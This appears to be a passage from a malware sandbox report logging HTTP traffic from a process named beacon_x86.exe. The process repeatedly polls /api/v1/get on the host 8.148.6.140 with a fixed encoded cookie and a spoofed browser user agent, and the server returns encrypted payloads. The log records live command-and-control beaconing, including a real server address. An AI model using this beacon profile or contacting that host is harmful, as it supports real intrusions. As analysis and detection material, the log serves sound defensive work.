        • 8.148.6.140
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.5497048.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:33:14.746783972 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:33:15.723031998 CET529INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:33:15 GMT
        Server: nginx
        Content-Length: 344
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 48 55 70 78 53 4a 6f 69 37 47 33 43 2f 62 7a 41 53 68 75 48 50 67 61 70 51 63 67 4d 6c 6e 75 43 33 41 34 44 4b 33 2b 58 38 67 63 4a 51 41 41 52 65 49 2b 6b 57 66 4c 48 56 2b 59 66 48 74 65 51 78 47 72 47 42 45 4e 33 77 30 2f 6a 52 48 2b 78 4e 63 6a 34 67 54 61 63 66 32 39 53 37 55 48 73 38 78 37 35 74 67 5a 6d 59 32 4f 50 43 55 33 49 54 76 70 43 33 69 71 4e 56 74 71 63 55 51 73 6d 42 56 6b 66 2b 37 33 57 34 53 39 36 76 59 55 73 6c 55 75 79 66 47 77 61 6b 48 5a 58 43 53 53 6d 58 4f 62 4a 48 56 73 59 4d 4d 48 49 4d 73 63 69 42 4c 6c 36 72 4f 59 42 51 70 4b 6b 65 42 61 55 58 38 42 47 58 4b 44 61 55 56 78 6c 6e 70 58 72 78 49 67 6a 30 73 4c 2f 78 37 2f 61 71 37 37 62 47 57 70 4f 46 77 57 4c 35 54 36 4d 67 56 6c 53 2f 35 6d 79 32 79 33 4b 37 6d 52 39 6f 4c 4b 69 31 41 6d 70 49 36 52 52 33 30 52 6c 41 7a 63 75 68 77 53 31 48 49 6d 56 52 69 42 48 6e 6f 6e 38 56 57 52 39 58 31 72 65 57 42 63 6b 76 54 36 58 72 2f 39 73 71 70 53 63 76 64 37 62 45 61 4b 63 50 75 7a 54 31 34 41 35 63 48 43 54 4b 32 38 39 76 65 [TRUNCATED]
        Data Ascii: HUpxSJoi7G3C/bzAShuHPgapQcgMlnuC3A4DK3+X8gcJQAAReI+kWfLHV+YfHteQxGrGBEN3w0/jRH+xNcj4gTacf29S7UHs8x75tgZmY2OPCU3ITvpC3iqNVtqcUQsmBVkf+73W4S96vYUslUuyfGwakHZXCSSmXObJHVsYMMHIMsciBLl6rOYBQpKkeBaUX8BGXKDaUVxlnpXrxIgj0sL/x7/aq77bGWpOFwWL5T6MgVlS/5my2y3K7mR9oLKi1AmpI6RR30RlAzcuhwS1HImVRiBHnon8VWR9X1reWBckvT6Xr/9sqpScvd7bEaKcPuzT14A5cHCTK289ve+ayQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.5497058.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:33:27.206543922 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:33:28.167161942 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:33:28 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 38 38 72 52 36 6a 66 32 6c 42 62 5a 6a 34 46 6b 4c 30 68 2f 37 2f 4d 36 56 2f 4b 6e 53 79 77 47 72 43 47 72 69 4b 30 50 65 48 37 54 7a 62 64 51 58 49 64 68 66 6c 6a 6b 38 64 68 61 79 4f 70 39 49 4f 54 47 34 43 72 56 32 6b 54 51 44 54 76 4a 63 58 73 33 2f 75 51 4e 31 51 57 49 53 56 6c 53 75 2b 6d 52 42 53 42 70 38 6b 4a 4e 71 36 54 70 4b 35 4d 49 71 37 33 42 6a 6c 73 39 58 46 41 79 4c 64 71 7a 54 55 6c 36 65 56 6f 35 36 61 59 53 38 7a 6b 77 6b 64 57 30 49 54 58 4b 54 53 65 41 6c 37 6a 52 49 66 30 47 39 70 79 79 73 77 68 47 4c 6a 50 6a 36 71 45 35 31 35 47 65 55 2f 75 73 78 41 2b 5a 68 6c 53 4e 63 32 45 72 69 79 4a 65 67 69 76 39 58 33 4d 4c 62 73 33 5a 79 67 75 55 32 50 49 30 49 68 65 51 4c 77 4b 64 50 5a 56 70 79 50 58 49 61 4d 65 4f 33 4f 48 7a 54 31 42 75 63 64 50 73 38 69 72 41 45 48 66 57 52 79 36 55 72 4c 71 6f 49 64 46 4a 4d 7a 49 51 45 64 64 6c 4e 6d 68 42 6d 75 5a 32 31 49 42 64 31 77 70 48 67 51 49 6a 65 33 37 58 41 59 39 75 74 6a 47 53
        Data Ascii: 88rR6jf2lBbZj4FkL0h/7/M6V/KnSywGrCGriK0PeH7TzbdQXIdhfljk8dhayOp9IOTG4CrV2kTQDTvJcXs3/uQN1QWISVlSu+mRBSBp8kJNq6TpK5MIq73Bjls9XFAyLdqzTUl6eVo56aYS8zkwkdW0ITXKTSeAl7jRIf0G9pyyswhGLjPj6qE515GeU/usxA+ZhlSNc2EriyJegiv9X3MLbs3ZyguU2PI0IheQLwKdPZVpyPXIaMeO3OHzT1BucdPs8irAEHfWRy6UrLqoIdFJMzIQEddlNmhBmuZ21IBd1wpHgQIje37XAY9utjGS


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.5497868.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:33:43.116868973 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:33:53.089167118 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:33:52 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:33:53.089340925 CET300INData Raw: 6d 37 55 72 52 4a 76 70 65 6d 52 6c 48 4c 69 78 54 59 7a 2b 57 79 4e 42 43 33 6a 4d 38 61 48 59 55 35 4b 6d 58 4b 4a 51 64 68 42 39 34 74 56 46 68 53 30 44 6e 77 75 2b 42 36 48 73 44 4f 37 31 74 64 2f 63 37 73 6d 32 75 43 63 57 32 75 71 4d 50 79
        Data Ascii: m7UrRJvpemRlHLixTYz+WyNBC3jM8aHYU5KmXKJQdhB94tVFhS0Dnwu+B6HsDO71td/c7sm2uCcW2uqMPyky6rYIDLVHnRDlu8Fxc2z4eCLhpNjD/7AdGrM/lIaiF/qHbOLdbYPCTq93qwV2HuewCIWxCm+eoH0k5B6OjQcy3WVe16DKxyqKGyH4W7iFAilMAqYNa9ouZaSkN6Pc7OXAp48wM0aIuAwzKWf+RCsL/eGODofO+h0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.5499028.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:34:01.538283110 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:34:02.534269094 CET421INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:34:02 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 70 6b 33 51 79 4f 57 6c 31 4f 35 57 43 2b 4b 61 6b 58 4f 2f 71 79 71 54 79 4f 57 45 38 50 72 77 4c 44 48 2f 36 50 65 56 7a 72 49 69 74 6c 54 4f 67 4a 65 30 43 6b 55 6b 31 52 4c 35 48 74 50 5a 4a 57 57 52 2f 31 74 32 75 33 6a 6f 57 71 56 56 48 73 41 33 4f 50 46 70 4a 78 36 57 46 4a 79 67 4d 4b 6d 43 38 43 64 77 42 4e 78 4f 71 56 55 39 6b 50 76 77 2b 74 42 35 70 2f 44 4d 55 34 74 4e 4f 2b 68 59 62 6a 62 70 46 6f 76 74 7a 50 66 59 55 7a 72 32 31 57 51 6b 43 52 4b 50 51 63 4f 2b 34 4a 6f 32 73 48 6e 2b 36 4b 6c 61 36 47 6c 32 4f 67 6f 72 50 4f 72 74 71 71 70 70 52 6f 6c 4f 33 4f 75 47 38 42 50 65 53 57 79 56 42 68 2f 6a 5a 43 31 58 31 58 70 31 4f 39 54 41 57 56 6c 6b 46 32 62 4f 4a 6c 38 72 52 31 63 3d
        Data Ascii: pk3QyOWl1O5WC+KakXO/qyqTyOWE8PrwLDH/6PeVzrIitlTOgJe0CkUk1RL5HtPZJWWR/1t2u3joWqVVHsA3OPFpJx6WFJygMKmC8CdwBNxOqVU9kPvw+tB5p/DMU4tNO+hYbjbpFovtzPfYUzr21WQkCRKPQcO+4Jo2sHn+6Kla6Gl2OgorPOrtqqppRolO3OuG8BPeSWyVBh/jZC1X1Xp1O9TAWVlkF2bOJl8rR1c=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.5499798.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:34:13.603579998 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:34:14.582881927 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:34:14 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6b 74 64 6f 37 32 30 38 38 6a 61 43 2b 34 59 35 52 72 53 42 57 31 46 4a 6f 46 6a 36 30 6a 32 6b 50 59 79 7a 61 4c 32 4f 5a 4e 36 4d 33 4a 68 31 49 37 31 4b 50 77 34 48 6a 30 4c 44 43 6e 48 6b 5a 6a 6e 2f 70 62 4f 54 53 4f 61 77 64 6d 38 4e 6a 45 4b 6b 66 50 57 44 48 74 32 41 48 73 65 33 59 63 35 6b 7a 57 39 66 34 46 78 66 70 70 71 6f 6f 56 74 52 70 51 53 47 79 4d 30 77 78 33 38 79 79 37 77 6d 59 44 4b 55 32 77 71 48 52 71 49 5a 58 4e 66 45 38 4b 50 73 4e 32 65 53 74 6c 4d 65 7a 4a 30 70 73 32 4d 33 7a 75 56 52 77 30 4c 6b 79 72 72 4b 68 78 6e 34 36 36 5a 7a 33 55 77 4c
        Data Ascii: ktdo72088jaC+4Y5RrSBW1FJoFj60j2kPYyzaL2OZN6M3Jh1I71KPw4Hj0LDCnHkZjn/pbOTSOawdm8NjEKkfPWDHt2AHse3Yc5kzW9f4FxfppqooVtRpQSGyM0wx38yy7wmYDKU2wqHRqIZXNfE8KPsN2eStlMezJ0ps2M3zuVRw0LkyrrKhxn466Zz3UwL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.5499808.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:34:28.881055117 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:34:29.857074976 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:34:29 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:34:29.857170105 CET236INData Raw: 71 55 4c 7a 78 6f 67 4d 79 54 4a 4f 6c 71 75 59 64 62 56 2f 4f 32 57 62 69 56 41 30 58 58 30 63 52 71 34 4f 77 30 44 6c 55 5a 42 67 70 41 7a 48 44 39 66 64 73 38 6f 6a 59 47 66 2f 57 37 31 46 66 50 61 64 6c 70 58 2f 34 7a 34 73 61 51 30 6b 48 4a
        Data Ascii: qULzxogMyTJOlquYdbV/O2WbiVA0XX0cRq4Ow0DlUZBgpAzHD9fds8ojYGf/W71FfPadlpX/4z4saQ0kHJ4DaNffQLEOMm0VpmO1BNKzi4TUaEDkAjvwtcrsRpeI1G5PEN98xgWrJhK9eGlMQU8bossBqS95KAlKjptpwLSqtqE7cuwYPukl/fjZtybWj5IMMgE7Biffu/YBjkq8Fe4VNqI02iekqQp2moAlA3wmiW8=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.5499828.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:34:41.537434101 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:34:42.526767969 CET337INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:34:42 GMT
        Server: nginx
        Content-Length: 152
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 52 2f 6d 38 63 39 56 6d 78 42 69 75 76 2b 34 62 38 34 7a 68 72 59 6f 4f 61 74 76 4f 4f 67 30 47 36 48 43 42 47 50 73 4b 51 65 53 59 55 4b 32 6c 36 32 44 64 65 66 75 59 39 41 44 31 69 67 53 53 35 7a 6b 41 6d 5a 4a 56 44 5a 41 34 57 36 72 45 2f 64 5a 63 7a 4b 35 75 77 48 66 71 71 43 61 64 65 30 7a 32 69 78 39 4d 56 4c 79 42 55 32 2b 4a 4e 5a 50 31 7a 79 64 44 6c 59 76 33 6a 51 70 4a 32 72 6a 75 33 45 42 37 44 44 77 4c 4b 73 34 73 68 4b 42 6c 33 41 3d 3d
        Data Ascii: R/m8c9VmxBiuv+4b84zhrYoOatvOOg0G6HCBGPsKQeSYUK2l62DdefuY9AD1igSS5zkAmZJVDZA4W6rE/dZczK5uwHfqqCade0z2ix9MVLyBU2+JNZP1zydDlYv3jQpJ2rju3EB7DDwLKs4shKBl3A==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.5499838.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:34:56.225063086 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:34:57.190067053 CET272INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:34:57 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 54 30 74 50 32 73 57 48 68 76 36 41 74 36 2f 42 6c 6c 30 6b 6e 2b 36 52 72 70 67 74 78 34 48 39 44 2f 33 2f 6f 31 43 6e 36 62 73 38 36 34 41 39 68 49 6d 59 62 59 53 70 34 79 76 64 37 67 76 79 44 52 4a 4d 49 65 79 69 2f 50 53 6c 62 47 70 65 47 74 63 68 45 77 3d 3d
        Data Ascii: T0tP2sWHhv6At6/Bll0kn+6Rrpgtx4H9D/3/o1Cn6bs864A9hImYbYSp4yvd7gvyDRJMIeyi/PSlbGpeGtchEw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.2.5499848.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:35:07.959367037 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:35:08.935903072 CET184INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:35:08 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:35:08.935966015 CET88INData Raw: 4a 4a 75 46 48 2b 6b 6b 48 53 78 6f 6d 76 2b 52 48 57 76 41 71 2f 39 32 6b 73 78 6e 7a 5a 78 57 39 47 76 7a 53 57 6f 34 4f 4c 36 63 61 33 39 66 68 6c 63 35 58 56 73 54 59 6d 74 55 49 74 33 62 65 77 52 79 4a 74 34 6e 67 74 5a 58 69 50 33 6c 4b 56
        Data Ascii: JJuFH+kkHSxomv+RHWvAq/92ksxnzZxW9GvzSWo4OL6ca39fhlc5XVsTYmtUIt3bewRyJt4ngtZXiP3lKVwCyQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.2.5499858.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:35:23.515551090 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:35:24.504993916 CET337INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:35:24 GMT
        Server: nginx
        Content-Length: 152
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 70 33 78 6c 4f 7a 33 7a 6e 76 56 49 35 73 6a 62 4e 4a 62 6b 4e 6d 6c 39 52 57 6e 64 54 6e 39 52 6f 68 37 64 64 33 44 65 79 6d 7a 76 55 50 69 54 69 38 65 44 35 47 76 6d 54 4a 70 6c 37 65 50 36 7a 70 35 36 32 41 5a 6a 79 77 33 6a 31 50 30 44 55 71 49 39 34 55 62 5a 55 46 61 63 76 54 47 77 79 50 72 6a 53 46 6d 4b 59 78 33 57 64 4a 71 53 47 62 47 56 4c 73 78 54 72 72 44 47 59 33 6c 6c 4f 4f 6d 32 49 73 47 47 64 6d 54 32 35 79 38 6b 6e 52 45 33 6f 41 3d 3d
        Data Ascii: p3xlOz3znvVI5sjbNJbkNml9RWndTn9Roh7dd3DeymzvUPiTi8eD5GvmTJpl7eP6zp562AZjyw3j1P0DUqI94UbZUFacvTGwyPrjSFmKYx3WdJqSGbGVLsxTrrDGY3llOOm2IsGGdmT25y8knRE3oA==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.2.5499868.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:35:37.865269899 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:35:39.461031914 CET421INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:35:39 GMT
        Server: nginx
        Content-Length: 236
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 50 4d 66 6c 6d 42 5a 30 44 77 68 36 54 2b 6c 46 68 49 2f 71 5a 6f 57 78 49 4e 2b 49 4b 36 46 41 32 50 66 6e 78 46 39 44 45 51 42 39 2f 2f 51 71 6d 63 48 62 66 36 39 6e 6c 69 4e 65 76 68 54 76 5a 51 6c 69 48 35 6c 59 33 53 70 75 42 6b 31 58 69 61 61 6f 76 30 6f 65 57 51 4a 65 71 66 6f 51 4f 30 6f 32 47 41 6d 76 6d 71 65 4e 36 5a 44 6c 4e 7a 58 53 39 4d 30 59 41 68 37 67 69 46 61 6d 53 45 51 41 6b 74 53 39 41 32 49 6c 4c 6f 50 65 4b 2b 4b 6e 78 31 2f 52 41 36 37 45 76 62 68 56 61 57 6f 59 57 6d 4b 76 37 71 6d 70 78 75 74 56 6d 32 49 4c 54 37 66 44 72 6b 45 63 39 61 38 4b 66 72 72 56 6f 4f 6f 48 44 4a 76 6e 66 48 4e 48 42 53 6c 58 62 69 2b 36 5a 4b 68 34 69 61 75 66 66 39 39 6b 4d 56 6a 59 45 6b 77 3d
        Data Ascii: PMflmBZ0Dwh6T+lFhI/qZoWxIN+IK6FA2PfnxF9DEQB9//QqmcHbf69nliNevhTvZQliH5lY3SpuBk1Xiaaov0oeWQJeqfoQO0o2GAmvmqeN6ZDlNzXS9M0YAh7giFamSEQAktS9A2IlLoPeK+Knx1/RA67EvbhVaWoYWmKv7qmpxutVm2ILT7fDrkEc9a8KfrrVoOoHDJvnfHNHBSlXbi+6ZKh4iauff99kMVjYEkw=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        11192.168.2.5499878.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:35:53.350166082 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:35:54.346221924 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:35:54 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
